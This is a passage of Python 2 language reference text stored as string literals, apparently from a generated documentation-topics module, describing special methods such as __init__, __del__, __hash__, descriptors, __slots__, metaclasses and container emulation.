*cls*, then the ' 'new\n' ' instance\'s "__init__()" method will be invoked like\n' ' "__init__(self[, ...])", where *self* is the new instance ' 'and the\n' ' remaining arguments are the same as were passed to ' '"__new__()".\n' '\n' ' If "__new__()" does not return an instance of *cls*, then ' 'the new\n' ' instance\'s "__init__()" method will not be invoked.\n' '\n' ' "__new__()" is intended mainly to allow subclasses of ' 'immutable\n' ' types (like int, str, or tuple) to customize instance ' 'creation. It\n' ' is also commonly overridden in custom metaclasses in ' 'order to\n' ' customize class creation.\n' '\n' 'object.__init__(self[, ...])\n' '\n' ' Called after the instance has been created (by ' '"__new__()"), but\n' ' before it is returned to the caller. The arguments are ' 'those\n' ' passed to the class constructor expression. If a base ' 'class has an\n' ' "__init__()" method, the derived class\'s "__init__()" ' 'method, if\n' ' any, must explicitly call it to ensure proper ' 'initialization of the\n' ' base class part of the instance; for example:\n' ' "BaseClass.__init__(self, [args...])".\n' '\n' ' Because "__new__()" and "__init__()" work together in ' 'constructing\n' ' objects ("__new__()" to create it, and "__init__()" to ' 'customise\n' ' it), no non-"None" value may be returned by "__init__()"; ' 'doing so\n' ' will cause a "TypeError" to be raised at runtime.\n' '\n' 'object.__del__(self)\n' '\n' ' Called when the instance is about to be destroyed. This ' 'is also\n' ' called a destructor. If a base class has a "__del__()" ' 'method, the\n' ' derived class\'s "__del__()" method, if any, must ' 'explicitly call it\n' ' to ensure proper deletion of the base class part of the ' 'instance.\n' ' Note that it is possible (though not recommended!) for ' 'the\n' ' "__del__()" method to postpone destruction of the ' 'instance by\n' ' creating a new reference to it. It may then be called at ' 'a later\n' ' time when this new reference is deleted. It is not ' 'guaranteed that\n' ' "__del__()" methods are called for objects that still ' 'exist when\n' ' the interpreter exits.\n' '\n' ' Note: "del x" doesn\'t directly call "x.__del__()" --- ' 'the former\n' ' decrements the reference count for "x" by one, and the ' 'latter is\n' ' only called when "x"\'s reference count reaches zero. ' 'Some common\n' ' situations that may prevent the reference count of an ' 'object from\n' ' going to zero include: circular references between ' 'objects (e.g.,\n' ' a doubly-linked list or a tree data structure with ' 'parent and\n' ' child pointers); a reference to the object on the stack ' 'frame of\n' ' a function that caught an exception (the traceback ' 'stored in\n' ' "sys.exc_traceback" keeps the stack frame alive); or a ' 'reference\n' ' to the object on the stack frame that raised an ' 'unhandled\n' ' exception in interactive mode (the traceback stored in\n' ' "sys.last_traceback" keeps the stack frame alive). The ' 'first\n' ' situation can only be remedied by explicitly breaking ' 'the cycles;\n' ' the latter two situations can be resolved by storing ' '"None" in\n' ' "sys.exc_traceback" or "sys.last_traceback". Circular ' 'references\n' ' which are garbage are detected when the option cycle ' 'detector is\n' " enabled (it's on by default), but can only be cleaned " 'up if there\n' ' are no Python-level "__del__()" methods involved. Refer ' 'to the\n' ' documentation for the "gc" module for more information ' 'about how\n' ' "__del__()" methods are handled by the cycle detector,\n' ' particularly the description of the "garbage" value.\n' '\n' ' Warning: Due to the precarious circumstances under which\n' ' "__del__()" methods are invoked, exceptions that occur ' 'during\n' ' their execution are ignored, and a warning is printed ' 'to\n' ' "sys.stderr" instead. Also, when "__del__()" is invoked ' 'in\n' ' response to a module being deleted (e.g., when ' 'execution of the\n' ' program is done), other globals referenced by the ' '"__del__()"\n' ' method may already have been deleted or in the process ' 'of being\n' ' torn down (e.g. the import machinery shutting down). ' 'For this\n' ' reason, "__del__()" methods should do the absolute ' 'minimum needed\n' ' to maintain external invariants. Starting with version ' '1.5,\n' ' Python guarantees that globals whose name begins with a ' 'single\n' ' underscore are deleted from their module before other ' 'globals are\n' ' deleted; if no other references to such globals exist, ' 'this may\n' ' help in assuring that imported modules are still ' 'available at the\n' ' time when the "__del__()" method is called.\n' '\n' ' See also the "-R" command-line option.\n' '\n' 'object.__repr__(self)\n' '\n' ' Called by the "repr()" built-in function and by string ' 'conversions\n' ' (reverse quotes) to compute the "official" string ' 'representation of\n' ' an object. If at all possible, this should look like a ' 'valid\n' ' Python expression that could be used to recreate an ' 'object with the\n' ' same value (given an appropriate environment). If this ' 'is not\n' ' possible, a string of the form "<...some useful ' 'description...>"\n' ' should be returned. The return value must be a string ' 'object. If a\n' ' class defines "__repr__()" but not "__str__()", then ' '"__repr__()"\n' ' is also used when an "informal" string representation of ' 'instances\n' ' of that class is required.\n' '\n' ' This is typically used for debugging, so it is important ' 'that the\n' ' representation is information-rich and unambiguous.\n' '\n' 'object.__str__(self)\n' '\n' ' Called by the "str()" built-in function and by the ' '"print"\n' ' statement to compute the "informal" string representation ' 'of an\n' ' object. This differs from "__repr__()" in that it does ' 'not have to\n' ' be a valid Python expression: a more convenient or ' 'concise\n' ' representation may be used instead. The return value must ' 'be a\n' ' string object.\n' '\n' 'object.__lt__(self, other)\n' 'object.__le__(self, other)\n' 'object.__eq__(self, other)\n' 'object.__ne__(self, other)\n' 'object.__gt__(self, other)\n' 'object.__ge__(self, other)\n' '\n' ' New in version 2.1.\n' '\n' ' These are the so-called "rich comparison" methods, and ' 'are called\n' ' for comparison operators in preference to "__cmp__()" ' 'below. The\n' ' correspondence between operator symbols and method names ' 'is as\n' ' follows: "x<y" calls "x.__lt__(y)", "x<=y" calls ' '"x.__le__(y)",\n' ' "x==y" calls "x.__eq__(y)", "x!=y" and "x<>y" call ' '"x.__ne__(y)",\n' ' "x>y" calls "x.__gt__(y)", and "x>=y" calls ' '"x.__ge__(y)".\n' '\n' ' A rich comparison method may return the singleton ' '"NotImplemented"\n' ' if it does not implement the operation for a given pair ' 'of\n' ' arguments. By convention, "False" and "True" are returned ' 'for a\n' ' successful comparison. However, these methods can return ' 'any value,\n' ' so if the comparison operator is used in a Boolean ' 'context (e.g.,\n' ' in the condition of an "if" statement), Python will call ' '"bool()"\n' ' on the value to determine if the result is true or ' 'false.\n' '\n' ' There are no implied relationships among the comparison ' 'operators.\n' ' The truth of "x==y" does not imply that "x!=y" is false.\n' ' Accordingly, when defining "__eq__()", one should also ' 'define\n' ' "__ne__()" so that the operators will behave as ' 'expected. See the\n' ' paragraph on "__hash__()" for some important notes on ' 'creating\n' ' *hashable* objects which support custom comparison ' 'operations and\n' ' are usable as dictionary keys.\n' '\n' ' There are no swapped-argument versions of these methods ' '(to be used\n' ' when the left argument does not support the operation but ' 'the right\n' ' argument does); rather, "__lt__()" and "__gt__()" are ' "each other's\n" ' reflection, "__le__()" and "__ge__()" are each other\'s ' 'reflection,\n' ' and "__eq__()" and "__ne__()" are their own reflection.\n' '\n' ' Arguments to rich comparison methods are never coerced.\n' '\n' ' To automatically generate ordering operations from a ' 'single root\n' ' operation, see "functools.total_ordering()".\n' '\n' 'object.__cmp__(self, other)\n' '\n' ' Called by comparison operations if rich comparison (see ' 'above) is\n' ' not defined. Should return a negative integer if "self < ' 'other",\n' ' zero if "self == other", a positive integer if "self > ' 'other". If\n' ' no "__cmp__()", "__eq__()" or "__ne__()" operation is ' 'defined,\n' ' class instances are compared by object identity ' '("address"). See\n' ' also the description of "__hash__()" for some important ' 'notes on\n' ' creating *hashable* objects which support custom ' 'comparison\n' ' operations and are usable as dictionary keys. (Note: the\n' ' restriction that exceptions are not propagated by ' '"__cmp__()" has\n' ' been removed since Python 1.5.)\n' '\n' 'object.__rcmp__(self, other)\n' '\n' ' Changed in version 2.1: No longer supported.\n' '\n' 'object.__hash__(self)\n' '\n' ' Called by built-in function "hash()" and for operations ' 'on members\n' ' of hashed collections including "set", "frozenset", and ' '"dict".\n' ' "__hash__()" should return an integer. The only required ' 'property\n' ' is that objects which compare equal have the same hash ' 'value; it is\n' ' advised to somehow mix together (e.g. using exclusive or) ' 'the hash\n' ' values for the components of the object that also play a ' 'part in\n' ' comparison of objects.\n' '\n' ' If a class does not define a "__cmp__()" or "__eq__()" ' 'method it\n' ' should not define a "__hash__()" operation either; if it ' 'defines\n' ' "__cmp__()" or "__eq__()" but not "__hash__()", its ' 'instances will\n' ' not be usable in hashed collections. If a class defines ' 'mutable\n' ' objects and implements a "__cmp__()" or "__eq__()" ' 'method, it\n' ' should not implement "__hash__()", since hashable ' 'collection\n' " implementations require that a object's hash value is " 'immutable (if\n' " the object's hash value changes, it will be in the wrong " 'hash\n' ' bucket).\n' '\n' ' User-defined classes have "__cmp__()" and "__hash__()" ' 'methods by\n' ' default; with them, all objects compare unequal (except ' 'with\n' ' themselves) and "x.__hash__()" returns a result derived ' 'from\n' ' "id(x)".\n' '\n' ' Classes which inherit a "__hash__()" method from a parent ' 'class but\n' ' change the meaning of "__cmp__()" or "__eq__()" such that ' 'the hash\n' ' value returned is no longer appropriate (e.g. by ' 'switching to a\n' ' value-based concept of equality instead of the default ' 'identity\n' ' based equality) can explicitly flag themselves as being ' 'unhashable\n' ' by setting "__hash__ = None" in the class definition. ' 'Doing so\n' ' means that not only will instances of the class raise an\n' ' appropriate "TypeError" when a program attempts to ' 'retrieve their\n' ' hash value, but they will also be correctly identified ' 'as\n' ' unhashable when checking "isinstance(obj, ' 'collections.Hashable)"\n' ' (unlike classes which define their own "__hash__()" to ' 'explicitly\n' ' raise "TypeError").\n' '\n' ' Changed in version 2.5: "__hash__()" may now also return ' 'a long\n' ' integer object; the 32-bit integer is then derived from ' 'the hash of\n' ' that object.\n' '\n' ' Changed in version 2.6: "__hash__" may now be set to ' '"None" to\n' ' explicitly flag instances of a class as unhashable.\n' '\n' 'object.__nonzero__(self)\n' '\n' ' Called to implement truth value testing and the built-in ' 'operation\n' ' "bool()"; should return "False" or "True", or their ' 'integer\n' ' equivalents "0" or "1". When this method is not ' 'defined,\n' ' "__len__()" is called, if it is defined, and the object ' 'is\n' ' considered true if its result is nonzero. If a class ' 'defines\n' ' neither "__len__()" nor "__nonzero__()", all its ' 'instances are\n' ' considered true.\n' '\n' 'object.__unicode__(self)\n' '\n' ' Called to implement "unicode()" built-in; should return a ' 'Unicode\n' ' object. When this method is not defined, string ' 'conversion is\n' ' attempted, and the result of string conversion is ' 'converted to\n' ' Unicode using the system default encoding.\n' '\n' '\n' 'Customizing attribute access\n' '============================\n' '\n' 'The following methods can be defined to customize the ' 'meaning of\n' 'attribute access (use of, assignment to, or deletion of ' '"x.name") for\n' 'class instances.\n' '\n' 'object.__getattr__(self, name)\n' '\n' ' Called when an attribute lookup has not found the ' 'attribute in the\n' ' usual places (i.e. it is not an instance attribute nor is ' 'it found\n' ' in the class tree for "self"). "name" is the attribute ' 'name. This\n' ' method should return the (computed) attribute value or ' 'raise an\n' ' "AttributeError" exception.\n' '\n' ' Note that if the attribute is found through the normal ' 'mechanism,\n' ' "__getattr__()" is not called. (This is an intentional ' 'asymmetry\n' ' between "__getattr__()" and "__setattr__()".) This is ' 'done both for\n' ' efficiency reasons and because otherwise "__getattr__()" ' 'would have\n' ' no way to access other attributes of the instance. Note ' 'that at\n' ' least for instance variables, you can fake total control ' 'by not\n' ' inserting any values in the instance attribute dictionary ' '(but\n' ' instead inserting them in another object). See the\n' ' "__getattribute__()" method below for a way to actually ' 'get total\n' ' control in new-style classes.\n' '\n' 'object.__setattr__(self, name, value)\n' '\n' ' Called when an attribute assignment is attempted. This ' 'is called\n' ' instead of the normal mechanism (i.e. store the value in ' 'the\n' ' instance dictionary). *name* is the attribute name, ' '*value* is the\n' ' value to be assigned to it.\n' '\n' ' If "__setattr__()" wants to assign to an instance ' 'attribute, it\n' ' should not simply execute "self.name = value" --- this ' 'would cause\n' ' a recursive call to itself. Instead, it should insert ' 'the value in\n' ' the dictionary of instance attributes, e.g., ' '"self.__dict__[name] =\n' ' value". For new-style classes, rather than accessing the ' 'instance\n' ' dictionary, it should call the base class method with the ' 'same\n' ' name, for example, "object.__setattr__(self, name, ' 'value)".\n' '\n' 'object.__delattr__(self, name)\n' '\n' ' Like "__setattr__()" but for attribute deletion instead ' 'of\n' ' assignment. This should only be implemented if "del ' 'obj.name" is\n' ' meaningful for the object.\n' '\n' '\n' 'More attribute access for new-style classes\n' '-------------------------------------------\n' '\n' 'The following methods only apply to new-style classes.\n' '\n' 'object.__getattribute__(self, name)\n' '\n' ' Called unconditionally to implement attribute accesses ' 'for\n' ' instances of the class. If the class also defines ' '"__getattr__()",\n' ' the latter will not be called unless "__getattribute__()" ' 'either\n' ' calls it explicitly or raises an "AttributeError". This ' 'method\n' ' should return the (computed) attribute value or raise an\n' ' "AttributeError" exception. In order to avoid infinite ' 'recursion in\n' ' this method, its implementation should always call the ' 'base class\n' ' method with the same name to access any attributes it ' 'needs, for\n' ' example, "object.__getattribute__(self, name)".\n' '\n' ' Note: This method may still be bypassed when looking up ' 'special\n' ' methods as the result of implicit invocation via ' 'language syntax\n' ' or built-in functions. See Special method lookup for ' 'new-style\n' ' classes.\n' '\n' '\n' 'Implementing Descriptors\n' '------------------------\n' '\n' 'The following methods only apply when an instance of the ' 'class\n' 'containing the method (a so-called *descriptor* class) ' 'appears in an\n' "*owner* class (the descriptor must be in either the owner's " 'class\n' 'dictionary or in the class dictionary for one of its ' 'parents). In the\n' 'examples below, "the attribute" refers to the attribute ' 'whose name is\n' 'the key of the property in the owner class\' "__dict__".\n' '\n' 'object.__get__(self, instance, owner)\n' '\n' ' Called to get the attribute of the owner class (class ' 'attribute\n' ' access) or of an instance of that class (instance ' 'attribute\n' ' access). *owner* is always the owner class, while ' '*instance* is the\n' ' instance that the attribute was accessed through, or ' '"None" when\n' ' the attribute is accessed through the *owner*. This ' 'method should\n' ' return the (computed) attribute value or raise an ' '"AttributeError"\n' ' exception.\n' '\n' 'object.__set__(self, instance, value)\n' '\n' ' Called to set the attribute on an instance *instance* of ' 'the owner\n' ' class to a new value, *value*.\n' '\n' 'object.__delete__(self, instance)\n' '\n' ' Called to delete the attribute on an instance *instance* ' 'of the\n' ' owner class.\n' '\n' '\n' 'Invoking Descriptors\n' '--------------------\n' '\n' 'In general, a descriptor is an object attribute with ' '"binding\n' 'behavior", one whose attribute access has been overridden by ' 'methods\n' 'in the descriptor protocol: "__get__()", "__set__()", and\n' '"__delete__()". If any of those methods are defined for an ' 'object, it\n' 'is said to be a descriptor.\n' '\n' 'The default behavior for attribute access is to get, set, or ' 'delete\n' "the attribute from an object's dictionary. For instance, " '"a.x" has a\n' 'lookup chain starting with "a.__dict__[\'x\']", then\n' '"type(a).__dict__[\'x\']", and continuing through the base ' 'classes of\n' '"type(a)" excluding metaclasses.\n' '\n' 'However, if the looked-up value is an object defining one of ' 'the\n' 'descriptor methods, then Python may override the default ' 'behavior and\n' 'invoke the descriptor method instead. Where this occurs in ' 'the\n' 'precedence chain depends on which descriptor methods were ' 'defined and\n' 'how they were called. Note that descriptors are only ' 'invoked for new\n' 'style objects or classes (ones that subclass "object()" or ' '"type()").\n' '\n' 'The starting point for descriptor invocation is a binding, ' '"a.x". How\n' 'the arguments are assembled depends on "a":\n' '\n' 'Direct Call\n' ' The simplest and least common call is when user code ' 'directly\n' ' invokes a descriptor method: "x.__get__(a)".\n' '\n' 'Instance Binding\n' ' If binding to a new-style object instance, "a.x" is ' 'transformed\n' ' into the call: "type(a).__dict__[\'x\'].__get__(a, ' 'type(a))".\n' '\n' 'Class Binding\n' ' If binding to a new-style class, "A.x" is transformed ' 'into the\n' ' call: "A.__dict__[\'x\'].__get__(None, A)".\n' '\n' 'Super Binding\n' ' If "a" is an instance of "super", then the binding ' '"super(B,\n' ' obj).m()" searches "obj.__class__.__mro__" for the base ' 'class "A"\n' ' immediately preceding "B" and then invokes the descriptor ' 'with the\n' ' call: "A.__dict__[\'m\'].__get__(obj, obj.__class__)".\n' '\n' 'For instance bindings, the precedence of descriptor ' 'invocation depends\n' 'on the which descriptor methods are defined. A descriptor ' 'can define\n' 'any combination of "__get__()", "__set__()" and ' '"__delete__()". If it\n' 'does not define "__get__()", then accessing the attribute ' 'will return\n' 'the descriptor object itself unless there is a value in the ' "object's\n" 'instance dictionary. If the descriptor defines "__set__()" ' 'and/or\n' '"__delete__()", it is a data descriptor; if it defines ' 'neither, it is\n' 'a non-data descriptor. Normally, data descriptors define ' 'both\n' '"__get__()" and "__set__()", while non-data descriptors have ' 'just the\n' '"__get__()" method. Data descriptors with "__set__()" and ' '"__get__()"\n' 'defined always override a redefinition in an instance ' 'dictionary. In\n' 'contrast, non-data descriptors can be overridden by ' 'instances.\n' '\n' 'Python methods (including "staticmethod()" and ' '"classmethod()") are\n' 'implemented as non-data descriptors. Accordingly, instances ' 'can\n' 'redefine and override methods. This allows individual ' 'instances to\n' 'acquire behaviors that differ from other instances of the ' 'same class.\n' '\n' 'The "property()" function is implemented as a data ' 'descriptor.\n' 'Accordingly, instances cannot override the behavior of a ' 'property.\n' '\n' '\n' '__slots__\n' '---------\n' '\n' 'By default, instances of both old and new-style classes have ' 'a\n' 'dictionary for attribute storage. This wastes space for ' 'objects\n' 'having very few instance variables. The space consumption ' 'can become\n' 'acute when creating large numbers of instances.\n' '\n' 'The default can be overridden by defining *__slots__* in a ' 'new-style\n' 'class definition. The *__slots__* declaration takes a ' 'sequence of\n' 'instance variables and reserves just enough space in each ' 'instance to\n' 'hold a value for each variable. Space is saved because ' '*__dict__* is\n' 'not created for each instance.\n' '\n' '__slots__\n' '\n' ' This class variable can be assigned a string, iterable, ' 'or sequence\n' ' of strings with variable names used by instances. If ' 'defined in a\n' ' new-style class, *__slots__* reserves space for the ' 'declared\n' ' variables and prevents the automatic creation of ' '*__dict__* and\n' ' *__weakref__* for each instance.\n' '\n' ' New in version 2.2.\n' '\n' 'Notes on using *__slots__*\n' '\n' '* When inheriting from a class without *__slots__*, the ' '*__dict__*\n' ' attribute of that class will always be accessible, so a ' '*__slots__*\n' ' definition in the subclass is meaningless.\n' '\n' '* Without a *__dict__* variable, instances cannot be ' 'assigned new\n' ' variables not listed in the *__slots__* definition. ' 'Attempts to\n' ' assign to an unlisted variable name raises ' '"AttributeError". If\n' ' dynamic assignment of new variables is desired, then add\n' ' "\'__dict__\'" to the sequence of strings in the ' '*__slots__*\n' ' declaration.\n' '\n' ' Changed in version 2.3: Previously, adding "\'__dict__\'" ' 'to the\n' ' *__slots__* declaration would not enable the assignment of ' 'new\n' ' attributes not specifically listed in the sequence of ' 'instance\n' ' variable names.\n' '\n' '* Without a *__weakref__* variable for each instance, ' 'classes\n' ' defining *__slots__* do not support weak references to ' 'its\n' ' instances. If weak reference support is needed, then add\n' ' "\'__weakref__\'" to the sequence of strings in the ' '*__slots__*\n' ' declaration.\n' '\n' ' Changed in version 2.3: Previously, adding ' '"\'__weakref__\'" to the\n' ' *__slots__* declaration would not enable support for weak\n' ' references.\n' '\n' '* *__slots__* are implemented at the class level by ' 'creating\n' ' descriptors (Implementing Descriptors) for each variable ' 'name. As a\n' ' result, class attributes cannot be used to set default ' 'values for\n' ' instance variables defined by *__slots__*; otherwise, the ' 'class\n' ' attribute would overwrite the descriptor assignment.\n' '\n' '* The action of a *__slots__* declaration is limited to the ' 'class\n' ' where it is defined. As a result, subclasses will have a ' '*__dict__*\n' ' unless they also define *__slots__* (which must only ' 'contain names\n' ' of any *additional* slots).\n' '\n' '* If a class defines a slot also defined in a base class, ' 'the\n' ' instance variable defined by the base class slot is ' 'inaccessible\n' ' (except by retrieving its descriptor directly from the ' 'base class).\n' ' This renders the meaning of the program undefined. In the ' 'future, a\n' ' check may be added to prevent this.\n' '\n' '* Nonempty *__slots__* does not work for classes derived ' 'from\n' ' "variable-length" built-in types such as "long", "str" and ' '"tuple".\n' '\n' '* Any non-string iterable may be assigned to *__slots__*. ' 'Mappings\n' ' may also be used; however, in the future, special meaning ' 'may be\n' ' assigned to the values corresponding to each key.\n' '\n' '* *__class__* assignment works only if both classes have the ' 'same\n' ' *__slots__*.\n' '\n' ' Changed in version 2.6: Previously, *__class__* assignment ' 'raised an\n' ' error if either new or old class had *__slots__*.\n' '\n' '\n' 'Customizing class creation\n' '==========================\n' '\n' 'By default, new-style classes are constructed using ' '"type()". A class\n' 'definition is read into a separate namespace and the value ' 'of class\n' 'name is bound to the result of "type(name, bases, dict)".\n' '\n' 'When the class definition is read, if *__metaclass__* is ' 'defined then\n' 'the callable assigned to it will be called instead of ' '"type()". This\n' 'allows classes or functions to be written which monitor or ' 'alter the\n' 'class creation process:\n' '\n' '* Modifying the class dictionary prior to the class being ' 'created.\n' '\n' '* Returning an instance of another class -- essentially ' 'performing\n' ' the role of a factory function.\n' '\n' "These steps will have to be performed in the metaclass's " '"__new__()"\n' 'method -- "type.__new__()" can then be called from this ' 'method to\n' 'create a class with different properties. This example adds ' 'a new\n' 'element to the class dictionary before creating the class:\n' '\n' ' class metacls(type):\n' ' def __new__(mcs, name, bases, dict):\n' " dict['foo'] = 'metacls was here'\n" ' return type.__new__(mcs, name, bases, dict)\n' '\n' 'You can of course also override other class methods (or add ' 'new\n' 'methods); for example defining a custom "__call__()" method ' 'in the\n' 'metaclass allows custom behavior when the class is called, ' 'e.g. not\n' 'always creating a new instance.\n' '\n' '__metaclass__\n' '\n' ' This variable can be any callable accepting arguments for ' '"name",\n' ' "bases", and "dict". Upon class creation, the callable ' 'is used\n' ' instead of the built-in "type()".\n' '\n' ' New in version 2.2.\n' '\n' 'The appropriate metaclass is determined by the following ' 'precedence\n' 'rules:\n' '\n' '* If "dict[\'__metaclass__\']" exists, it is used.\n' '\n' '* Otherwise, if there is at least one base class, its ' 'metaclass is\n' ' used (this looks for a *__class__* attribute first and if ' 'not found,\n' ' uses its type).\n' '\n' '* Otherwise, if a global variable named __metaclass__ ' 'exists, it is\n' ' used.\n' '\n' '* Otherwise, the old-style, classic metaclass ' '(types.ClassType) is\n' ' used.\n' '\n' 'The potential uses for metaclasses are boundless. Some ideas ' 'that have\n' 'been explored including logging, interface checking, ' 'automatic\n' 'delegation, automatic property creation, proxies, ' 'frameworks, and\n' 'automatic resource locking/synchronization.\n' '\n' '\n' 'Customizing instance and subclass checks\n' '========================================\n' '\n' 'New in version 2.6.\n' '\n' 'The following methods are used to override the default ' 'behavior of the\n' '"isinstance()" and "issubclass()" built-in functions.\n' '\n' 'In particular, the metaclass "abc.ABCMeta" implements these ' 'methods in\n' 'order to allow the addition of Abstract Base Classes (ABCs) ' 'as\n' '"virtual base classes" to any class or type (including ' 'built-in\n' 'types), including other ABCs.\n' '\n' 'class.__instancecheck__(self, instance)\n' '\n' ' Return true if *instance* should be considered a (direct ' 'or\n' ' indirect) instance of *class*. If defined, called to ' 'implement\n' ' "isinstance(instance, class)".\n' '\n' 'class.__subclasscheck__(self, subclass)\n' '\n' ' Return true if *subclass* should be considered a (direct ' 'or\n' ' indirect) subclass of *class*. If defined, called to ' 'implement\n' ' "issubclass(subclass, class)".\n' '\n' 'Note that these methods are looked up on the type ' '(metaclass) of a\n' 'class. They cannot be defined as class methods in the ' 'actual class.\n' 'This is consistent with the lookup of special methods that ' 'are called\n' 'on instances, only in this case the instance is itself a ' 'class.\n' '\n' 'See also:\n' '\n' ' **PEP 3119** - Introducing Abstract Base Classes\n' ' Includes the specification for customizing ' '"isinstance()" and\n' ' "issubclass()" behavior through "__instancecheck__()" ' 'and\n' ' "__subclasscheck__()", with motivation for this ' 'functionality in\n' ' the context of adding Abstract Base Classes (see the ' '"abc"\n' ' module) to the language.\n' '\n' '\n' 'Emulating callable objects\n' '==========================\n' '\n' 'object.__call__(self[, args...])\n' '\n' ' Called when the instance is "called" as a function; if ' 'this method\n' ' is defined, "x(arg1, arg2, ...)" is a shorthand for\n' ' "x.__call__(arg1, arg2, ...)".\n' '\n' '\n' 'Emulating container types\n' '=========================\n' '\n' 'The following methods can be defined to implement container ' 'objects.\n' 'Containers usually are sequences (such as lists or tuples) ' 'or mappings\n' '(like dictionaries), but can represent other containers as ' 'well. The\n' 'first set of methods is used either to emulate a sequence or ' 'to\n' 'emulate a mapping; the difference is that for a sequence, ' 'the\n' 'allowable keys should be the integers *k* for which "0 <= k ' '< N" where\n' '*N* is the length of the sequence, or slice objects, which ' 'define a\n' 'range of items. (For backwards compatibility, the method\n' '"__getslice__()" (see below) can also be defined to handle ' 'simple, but\n' 'not extended slices.) It is also recommended that mappings ' 'provide the\n' 'methods "keys()", "values()", "items()", "has_key()", ' '"get()",\n' '"clear()", "setdefault()", "iterkeys()", "itervalues()",\n' '"iteritems()", "pop()", "popitem()", "copy()", and ' '"update()" behaving\n' "similar to those for Python's standard dictionary objects. " 'The\n' '"UserDict" module provides a "DictMixin" class to help ' 'create those\n' 'methods from a base set of "__getitem__()", ' '"__setitem__()",\n' '"__delitem__()", and "keys()". Mutable sequences should ' 'provide\n' 'methods "append()", "count()", "index()", "extend()", ' '"insert()",\n' '"pop()", "remove()", "reverse()" and "sort()", like Python ' 'standard\n' 'list objects. Finally, sequence types should implement ' 'addition\n' '(meaning concatenation) and multiplication (meaning ' 'repetition) by\n' 'defining the methods "__add__()", "__radd__()", ' '"__iadd__()",\n' '"__mul__()", "__rmul__()" and "__imul__()" described below; ' 'they\n' 'should not define "__coerce__()" or other numerical ' 'operators. It is\n' 'recommended that both mappings and sequences implement the\n' '"__contains__()" method to allow efficient use of the "in" ' 'operator;\n' 'for mappings, "in" should be equivalent of "has_key()"; for ' 'sequences,\n' 'it should search through the values. It is further ' 'recommended that\n' 'both mappings and sequences implement the "__iter__()" ' 'method to allow\n' 'efficient iteration through the container; for mappings, ' '"__iter__()"\n' 'should be the same as "iterkeys()"; for sequences, it should ' 'iterate\n' 'through the values.\n' '\n' 'object.__len__(self)\n' '\n' ' Called to implement the built-in function "len()". ' 'Should return\n' ' the length of the object, an integer ">=" 0. Also, an ' 'object that\n' ' doesn\'t define a "__nonzero__()" method and whose ' '"__len__()"\n' ' method returns zero is considered to be false in a ' 'Boolean context.\n' '\n' 'object.__getitem__(self, key)\n' '\n' ' Called to implement evaluation of "self[key]". For ' 'sequence types,\n' ' the accepted keys should be integers and slice objects. ' 'Note that\n' ' the special interpretation of negative indexes (if the ' 'class wishes\n' ' to emulate a sequence type) is up to the "__getitem__()" ' 'method. If\n' ' *key* is of an inappropriate type, "TypeError" may be ' 'raised; if of\n' ' a value outside the set of indexes for the sequence ' '(after any\n' ' special interpretation of negative values), "IndexError" ' 'should be\n' ' raised. For mapping types, if *key* is missing (not in ' 'the\n' ' container), "KeyError" should be raised.\n' '\n' ' Note: "for" loops expect that an "IndexError" will be ' 'raised for\n' ' illegal indexes to allow proper detection of the end of ' 'the\n' ' sequence.\n' '\n' 'object.__missing__(self, key)\n' '\n' ' Called by "dict"."__getitem__()" to implement "self[key]" ' 'for dict\n' ' subclasses when key is not in the dictionary.\n' '\n' 'object.__setitem__(self, key, value)\n' '\n' ' Called to implement assignment to "self[key]". Same note ' 'as for\n' ' "__getitem__()". This should only be implemented for ' 'mappings if\n' ' the objects support changes to the values for keys, or if ' 'new keys\n' ' can be added, or for sequences if elements can be ' 'replaced. The\n' ' same exceptions should be raised for improper *key* ' 'values as for\n' ' the "__getitem__()" method.\n' '\n' 'object.__delitem__(self, key)\n' '\n' ' Called to implement deletion of "self[key]". Same note ' 'as for\n' ' "__getitem__()". This should only be implemented for ' 'mappings if\n' ' the objects support removal of keys, or for sequences if ' 'elements\n' ' can be removed from the sequence. The same exceptions ' 'should be\n' ' raised for improper *key* values as for the ' '"__getitem__()" method.\n' '\n' 'object.__iter__(self)\n' '\n' ' This method is called when an iterator is required for a ' 'container.\n' ' This method should return a new iterator object that can ' 'iterate\n' ' over all the objects in the container. For mappings, it ' 'should\n' ' iterate over the keys of the container, and should also ' 'be made\n' ' available as the method "iterkeys()".\n' '\n' ' Iterator objects also need to implement this method; they ' 'are\n' ' required to return themselves. For more information on ' 'iterator\n' ' objects, see Iterator Types.\n' '\n' 'object.__reversed__(self)\n' '\n' ' Called (if present) by the "reversed()" built-in to ' 'implement\n' ' reverse iteration. It should return a new iterator ' 'object that\n' ' iterates over all the objects in the container in reverse ' 'order.\n' '\n' ' If the "__reversed__()" method is not provided, the ' '"reversed()"\n' ' built-in will fall back to using the sequence protocol ' '("__len__()"\n' ' and "__getitem__()"). Objects that support the sequence ' 'protocol\n' ' should only provide "__reversed__()" if they can provide ' 'an\n' ' implementation that is more efficient than the one ' 'provided by\n' ' "reversed()".\n' '\n' ' New in version 2.6.\n' '\n' 'The membership test operators ("in" and "not in") are ' 'normally\n' 'implemented as an iteration through a sequence. However, ' 'container\n' 'objects can supply the following special method with a more ' 'efficient\n' 'implementation, which also does not require the object be a ' 'sequence.\n' '\n' 'object.__contains__(self, item)\n' '\n' ' Called to implement membership test operators. Should ' 'return true\n' ' if *item* is in *self*, false otherwise. For mapping ' 'objects, this\n' ' should consider the keys of the mapping rather than the ' 'values or\n' ' the key-item pairs.\n' '\n' ' For objects that don\'t define "__contains__()", the ' 'membership test\n' ' first tries iteration via "__iter__()", then the old ' 'sequence\n' ' iteration protocol via "__getitem__()", see this section ' 'in the\n' ' language reference.\n' '\n' '\n' 'Additional methods for emulation of sequence types\n' '==================================================\n' '\n' 'The following optional methods can be defined to further ' 'emulate\n' 'sequence objects. Immutable sequences methods should at ' 'most only\n' 'define "__getslice__()"; mutable sequences might define all ' 'three\n' 'methods.\n' '\n' 'object.__getslice__(self, i, j)\n' '\n' ' Deprecated since version 2.0: Support slice objects as ' 'parameters\n' ' to the "__getitem__()" method. (However, built-in types ' 'in CPython\n' ' currently still implement "__getslice__()". Therefore, ' 'you have to\n' ' override it in derived classes when implementing ' 'slicing.)\n' '\n' ' Called to implement evaluation of "self[i:j]". The ' 'returned object\n' ' should be of the same type as *self*. Note that missing ' '*i* or *j*\n' ' in the slice expression are replaced by zero or ' '"sys.maxsize",\n' ' respectively. If negative indexes are used in the slice, ' 'the\n' ' length of the sequence is added to that index. If the ' 'instance does\n' ' not implement the "__len__()" method, an "AttributeError" ' 'is\n' ' raised. No guarantee is made that indexes adjusted this ' 'way are not\n' ' still negative. Indexes which are greater than the ' 'length of the\n' ' sequence are not modified. If no "__getslice__()" is ' 